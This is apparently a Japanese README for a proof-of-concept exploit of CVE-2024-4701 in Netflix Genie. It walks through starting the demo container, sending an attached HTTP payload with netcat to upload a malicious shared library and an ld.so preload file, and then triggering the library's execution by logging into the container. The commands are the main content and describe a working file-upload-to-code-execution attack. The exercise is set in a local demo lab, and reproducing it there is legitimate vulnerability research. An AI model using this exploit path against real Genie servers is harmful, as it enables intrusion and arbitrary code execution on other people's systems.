
CVE-2024-4701 の POC
CVE-2024-4701 の POC
genie の docker ファイルを https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml またはこのリポジトリからダウンロードしてください
実行します
docker-compose up
添付の HTTP ペイロード loadlib をダウンロードします
次のコマンドを実行します
nc -w 5 localhost 8080 < loadlib
netcat ( nc ) をインストールする必要がある場合があります
これによりペイロードが docker で実行されている genie アプリに送信され、pe.so と ld.so.upload ファイルがアップロードされます。
次に genie-app の docker コンテナにログインします
docker exec -it genie_demo_app_4.3.0 /bin/bash
ログイン操作によって悪意のあるライブラリの実行がトリガーされるため、そのまま実行します
ls /tmp/
ディスクに書き込まれた file command.out を確認します。